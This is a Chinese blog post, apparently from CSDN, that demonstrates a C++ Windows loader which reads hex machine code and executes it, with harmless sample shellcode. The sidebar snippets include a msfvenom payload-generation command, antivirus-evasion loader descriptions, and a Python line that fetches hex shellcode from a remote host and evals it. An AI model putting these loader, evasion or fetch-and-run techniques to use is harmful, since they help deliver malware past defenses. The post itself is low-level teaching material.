一个简单的ShellCode执行器&代码(just for fun)

最新推荐文章于 2024-06-17 17:04:42 发布
最新推荐文章于 2024-06-17 17:04:42 发布
阅读量3.3k 收藏 2
点赞数 1
分类专栏: 底层&汇编 文章标签: 汇编 c++ c
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/gigzhu/article/details/41092361
版权
本文探讨如何在程序运行时读入并执行代码,基于冯·诺依曼结构的原理,通过动态链接库和脚本语言实现。文章提供了一个简单的C/C++ Demo,展示如何在运行时读入汇编代码并执行,强调了编写Shellcode的关键点,包括全局变量布局、字符字面常量处理和外部函数定位,并给出了几个示例Shellcode。
摘要由CSDN通过智能技术生成

好久没有写BLOG啦.

最近看到有个问题:如何做到在程序运行时读入并执行一段代码
这是很容易做到的,能够运行是因为冯·诺依曼结构中程序和数据并没有本质区别.

其实完全没有必要读入代码运行,动态链接库完全可以胜任这方面的需求

在运行时读入代码并执行其实是完全可行的,脚本语言更容易做到,当然了C/C++也可以,写个解释器吧

考虑最简单的情况,何为代码?机械码算不算代码呢?当然算啦

我们先观察一下代码是怎么样在机器(CPU)上运行的,观察内存和反汇编:

int add(int a, int b){
	return a + b;
}

反汇编如下:

add:
55                   push        ebp  
8B EC                mov         ebp,esp  
	return a + b;
8B 45 08             mov         eax,dword ptr [a]  
03 45 0C             add         eax,dword ptr [b]  
}
5D                   pop         ebp  
C3                   ret

调用函数add:

8B 55 F8             mov         edx,dword ptr [b]  
52                   push        edx  
8B 45 F4             mov         eax,dword ptr [a]  
50                   push        eax  
E8 BE FF FF FF       call        add (0A11020h)  

那么实际上在CPU上运行的就是左边的机器码,这代码被称为Shellcode: 

0x55 0x8B 0xEC 0x8B 0x45 0x08 0x03 0x45 0x0C 0x5D 0xC3

那么很明显,我们可以在运行时读入这串代码然后用一个函数指针指向该地址便可执行


写了个小Demo,在运行时提供了与系统交互的API

读入代码原型:

void __stdcall prime_number(void *funcAddrList);
ShellCode执行器: 

#include <stdio.h>
#include <memory>
#include <windows.h>

#define BUFSIZE 1<<12

struct BUFFER{
	byte *buf;
	int len;
	BUFFER(){
		len = BUFSIZE;
		buf = (byte*)malloc(len);
	}
	~BUFFER(){
		free(buf);
	}
};

typedef int(__stdcall *FUNC)(void*);
typedef std::shared_ptr<BUFFER> Buffer;

void eval(Buffer Addr,void* Prmt){
	DWORD OldProtect;
	VirtualProtectEx(GetCurrentProcess(),\
		Addr->buf, Addr->len,\
		PAGE_EXECUTE_READWRITE,\
		&OldProtect);
	FUNC func = (FUNC)Addr->buf;
	func(Prmt);
	VirtualProtectEx(GetCurrentProcess(),\
		Addr->buf,Addr->len,\
		OldProtect,\
		NULL);
}

int main(){
	Buffer code(new BUFFER);
	int i = 0;
	printf("Code Platform V1.0.2\n");
	while (i < BUFSIZE){
		scanf_s("%x", &code->buf[i]);
		if ((i>1)&&(code->buf[i] == 0x90 && 
			code->buf[i - 1] == 0xCC && 
			code->buf[i - 2] == 0x90)) 
			break;
		i++;
	}  //end with 0x90 0xCC 0x90
	printf("Running...\n");

	void* Prmt[] = { scanf_s, printf_s };
	eval(code, Prmt);
	return 0;
}

运行时输入代码并直接运行,存放代码的内存必须为可读和可执行的,使用VirtualProtectEx修改内存标志为可读可运行

编写Shellcode一般使用汇编和C编写,不能直接反汇编,有几个关键点:全局变量的内存布局,字符字面常量的处理,外部函数的定位.其他的和编写正常的汇编和C代码差不多,仍需要人工编写汇编代码.具体编写方式可以Google,看雪论坛上也有不少这方面的资料,特别是外部函数的定位,如果是一段溢出攻击的Shellcode那么要想有更高的权限必须定位关键的API,而这时并不像Demo里直接提供地址,这方面需要更高级的技术.

好,我编写了几段运行在该Demo上的代码,要想修改成其他的Shellcode也非常容易.

最简单的Hello World!:

0x55 0x8b 0xec 0x6a 0x0a 0x68 0x72 0x6c 0x64 0x21 0x68 0x6f 0x20 0x57 0x6f 0x68 
0x48 0x65 0x6c 0x6c 0x54 0x8b 0x5d 0x08 0x8b 0x43 0x04 0xff 0xd0 0x83 0xc4 0x14 
0x8b 0xe5 0x5d 0xc2 0x04 0x00 0x90 0xcc 0x90
a+b:

输入两个数a,b输出a+b

0x55 0x8b 0xec 0x33 0xc0 0x83 0xec 0x08 0x6a 0x00 0x68 0x25 0x64 0x25 0x64 0x8d 
0x44 0x24 0x0c 0x50 0x83 0xe8 0x04 0x50 0x83 0xe8 0x08 0x50 0x8b 0x5d 0x08 0x8b 
0x03 0xff 0xd0 0x83 0xc4 0x1c 0x8b 0x44 0x24 0xf8 0x03 0x44 0x24 0xfc 0x68 0x25 
0x64 0x0a 0x00 0x50 0x8d 0x44 0x24 0x04 0x50 0x8b 0x5d 0x08 0x8b 0x43 0x04 0xff 
0xd0 0x83 0xc4 0x0c 0x8b 0xe5 0x5d 0xc2 0x04 0x00 0x90 0xcc 0x90

输入整数n

输出:比n小的所有质数

0x8b 0x44 0x24 0x04 0x8b 0x58 0x04 0x53 0x8b 0x18 0x53 0x8b 0xcc 0xe8 0x06 0x00 
0x00 0x00 0x83 0xc4 0x08 0xc2 0x04 0x00 0x55 0x8b 0xec 0x83 0xec 0x24 0x53 0x56 
0x57 0x8b 0x79 0x04 0xc7 0x45 0xf8 0x00 0x00 0x00 0x00 0x6a 0x0a 0x89 0x65 0xdc 
0x68 0x25 0x64 0x20 0x00 0x89 0x65 0xe0 0x68 0x25 0x64 0x00 0x00 0x89 0x65 0xf0 
0x8d 0x45 0xfc 0x50 0xff 0x75 0xf0 0x8b 0x01 0xff 0xd0 0x8b 0x4d
最低0.47元/天 解锁文章
HingC-Chu
关注
  • 1
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
shellcode加载器
goat_2003的博客
09-10 1599
编写shellcode不能使用绝对地址,因为当我们加载到其他函数中时绝对地址储存的可能什么也没有,甚至是其他函数,所以当我们需要调用一个函数时,需要动态获取函数的地址实现调用。 想要动态获取函数地址,可以使用以下函数 GetProcAddress 从dll中获取函数的地址 LoadLibraryA 将指定的模块加载到调用进程的地址空间中 举个例子: LPVOID lp = GetProcAddress(LoadLibraryA("user32.dll"),"MessageBoxA"); _asm {
shellcode 执行盒
01-04
//msfvenom -p windows/exec CMD=calc.exe -f exe -e x86/shikata_ga_nai -i 6 -f c 生成shellcod 测试数据: bf6e4a2508d9ebd97424f45d33c9b131317d13037d1383c56aa8d0f49aae1b055acf92e06bcfc161dbff8224d774c6dc6cf8cfd3c5b729ddd6e40a7c54f75e5e6538939fa2255ecd7b21cde2087fce894291566d1290772029cb57c2fe67dedce342a857d7392bbe26c180ff8730d8382fabaf304c56a8862f8c3d1d9747e5f9268b70892460f6d52877db6d54fcdaa1dd46f965861d603f62f39d5fcdac3b2be3b93176693fc70cdf3fd70e4f28e685002ff74f65cf155a9378800f1ee533fa5c10b00f1ce7a86519a36e9553bc1a99c0bd0efa872dd2d322d6712c 将shellcode作为参数传入执行盒,./shllcode_Argv.exe bf6e4a2508d9ebd97424f45d33c9b131317d13037d1383c56aa8d0f49aae1b055acf92e06bcfc161dbff8224d774c6dc6cf8cfd3c5b729ddd6e40a7c54f75e5e6538939fa2255ecd7b21cde2087fce894291566d1290772029cb57c2fe67dedce342a857d7392bbe26c180ff8730d8382fabaf304c56a8862f8c3d1d9747e5f9268b70892460f6d52877db6d54fcdaa1dd46f965861d603f62f39d5fcdac3b2be3b93176693fc70cdf3fd70e4f28e685002ff74f65cf155a9378800f1ee533fa5c10b00f1ce7a86519a36e9553bc1a99c0bd0efa872dd2d322d6712c 即可执行该段shellcode。 该exe可传vt查看报毒情况,无特征码
shellcode执行盒_简单shellcode学习
weixin_39849127的博客
12-06 155
本文由“合天智汇”公众号首发 作者:hope引言之前遇到没开启NX保护的时候,都是直接用pwtools库里的shellcode一把梭,也不太懂shellcode代码具体做了些什么,遇到了几道不能一把梭的题目,简单学习一下shellcode的编写。前置知识NX(堆栈不可执行)保护shellcode(一段16进制的数据,转化为字符串则为汇编代码)pwnable之start保护检测可以看到这道题目什么保...
免杀基本知识,shellcode混淆免杀
最新发布
白帽子凯哥聊黑客
06-17 1198
根据源代码我们看到在执行完call ebp以后,就执行了设置地址的操作,也就是说在shellcode中存在了反弹连接的ip地址,这里我们将生成的exe程序放到debug程序中,根据c的源代码,我们的shellcode是在call eax中,所以首先要搜索call eax步入进去以后就进入到shellcde中的代码,在shellcode中找到call ebp。最常见的就是360,刚刚上传的木马没有报毒,但是几分钟之内就会被检测为病毒程序,就是因为360会使用云查杀技术,这也是360查杀能力强的原因。
3个月的SHELLCODE研究成果-一个简单Shellcode
小发猫
10-28 3449
坚持到底,永不放弃。我终于写了个小小的SHELLCODE啦。就拿这个星期来说,我日思夜想,为什么我总写不出可以正确执行的SHELLCODE呢,非常郁闷,也整天板着脸想问题,差点吓着小MM同事了。我本来ASSEMBLY基础不是很好,只懂得可怜的几个INSTRUCTIONS,写SHELLCODE时碰到了很多不认识的Instructions。还要上网差资料,有时真的是一头雾水。我看了很多前辈写的SHEL
An online avatar generator just for fun _ 一个纯前端实现的头像生成网站.zip
04-02
这个压缩包文件“An online avatar generator just for fun _ 一个纯前端实现的头像生成网站.zip”显然包含了一个在线头像生成器的源代码。这是一个基于前端技术开发的娱乐项目,用户可以使用它来创建个性化的虚拟...
python一个函数调用另一个函数的参数_Python中将函数作为另一个函数的参数传入并调用...
weixin_39831170的博客
11-24 1149
在Python中,函数本身也是对象,所以可以将函数作为参数传入另一函数并进行调用在旧版本中,可以使用apply(function, *args, **kwargs)进行调用,但是在新版本中已经移除,以function(*args, **kwargs)进行替代,所以也不应该再使用apply方法示例代码:def func_a(func, *args, **kwargs):print(func(*arg...
H5_Test:学习HTML JS CSS的项目等
05-01
GitHub是一个面向开源及私有软件项目的托管平台,基于Git进行版本控制。通过在GitHub上创建仓库并提交代码,可以记录和追踪每一次修改,便于多人协作和代码管理。`git commit`用于提交本地更改,`git push`则将本地...
matlab集成c代码-LittleProgramSet:Asetoflittleprograms.一些小程序,欢迎取用
05-22
matlab集成c代码 一些小程序 这个工程用来集中平时做的一些小程序 ...对一个可执行程序的反编译和破解 C++/IDA 信息安全 Feistel Feistel密码生成器 C++ 信息安全 CameraCheck 摄像头异常检测程序 Python/Open
NimShellCodeLoader:使用nim编写的shellcode加载器
02-03
NimShellCodeLoader Nim编写Windows平台shellcode免杀加载器 快速生成免杀毒性文件 更新: 20210123:增加三种加载shellcode方式,其中两种使用了库,需要安装该库才能正常编译 特点: 1:自带通常加载方式 2:可自行拓展加载方式 3:支持两种加密技术,分别位3des加密和凯撒密码,密钥随机,每次生成文件拥有不同的哈希 完全针对技术研究和获得正式授权的测试活动。 ##文件组成: bin中存放生成的重组文件 encryption存储加密代码文件 module中存放c ++功能文件 安装: 1,安装nim最新版 2,下载本项目,分别编译encryption中的Tdea.nim和Caesar.nim 。 nim c -d:release --opt:size Tdea.nim nim c -d:release --opt:size Caesar.nim 3,编译c#项目,将初始化文件放到当前目录 使用方法: 1,打开生成器 2,将有效载荷到该窗口 3,选择加载方式,点击生成,还原文件会保存到bin文件夹中 拓展: 1,新建ni
绕过AV:免杀shellcode加载器
03-04
旁路AV 条件触发式远控VT 6/70免杀国内杀软及后卫,卡巴斯基等主流杀软 原理 使用 将shellcode填至go_shellcode_encode.py生成重复后的base64有效负载然后将生成的payload填至main.go build(“ b64shellcode”)将main.go中的网址替换为您vbs的某个网页或文本(称为网页同样可以,但是需要程序可以正常使用时此网页需要可以访问)编译:go build -ldflags =“-w -s -H = windowsgui”
探索Shellcode_Loader:一款高效、灵活的Shellcode加载器
gitblog_00002的博客
04-22 626
探索Shellcode_Loader:一款高效、灵活的Shellcode加载器 项目地址:https://gitcode.com/Avienma/shellcode_loader 在安全研究和逆向工程领域,Shellcode一个关键元素,它是一段可以直接由处理器执行的小型机器码程序。然而,如何安全且有效地加载这些代码并不总是那么简单。这就是Shellcode_Loader项目的用武之地。本文将带...
一个简单shellcode如何写
qq_42764617的博客
12-01 1028
简单shellcode execve("/bin/sh",0,0); 通过简单汇编将这句shellcode描写出来 eax = 0xb ebx = “/bin/sh” ecx = 0 edx = 0 int 0x80 section .text global _start _start: xor eax,eax ;eax=0 push 0x0068732f ;/sh\x00 push 0x6e69622f ;/bin mov ebx,esp ;这里是将/bin/sh的地址传给
免杀之浅谈shellcode加载器
qq_46217803的博客
12-26 1794
VirtualAlloc:申请一个虚拟地址的空间,可以说为虚拟空间到物理空间的映射,简单来说,在虚拟空间操作,物理空间就会自动的分配物理地址。可以直接在内存中运行,不需要一个完整的pe结构,简单来说,内存能执行就能运行,没有啥依赖的“生存环境”设置一个指针类型的,也可以是别的,这里设置成NULL,这样系统会自动的去分配一个空间区域。就是一个类型属性,主要是内存分配的类型属性,可以去百度的,这里设置了两个值,去了解一下。还是以上的shellcode,本地生成的,用的是Visual Studio。
python编写shellcode_python生成shellcode加载器
weixin_39763293的博客
12-19 495
import ctypes, cPickle, base64, urllib2class ptr(object):def __reduce__(self):return(eval, ("urllib2.urlopen('http://192.168.1.100/s2.txt').read().decode('hex')",))# base64class buf(object):def __init...
推荐一个神器:ShellNoob——让Shellcode编写变得简单
gitblog_00041的博客
05-18 285
推荐一个神器:ShellNoob——让Shellcode编写变得简单shellnoobA shellcode writing toolkit项目地址:https://gitcode.com/gh_mirrors/sh/shellnoob Shellcode是低级编程中的关键元素,用于在内存中直接执行代码。但是编写和调试它们可能既繁琐又容易出错。现在,有了ShellNoob,你可以专注于创造的...
多种基础Shellcode加载器
Liyu_6618的博客
02-02 702
多种编程语言Shellcode的模板
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值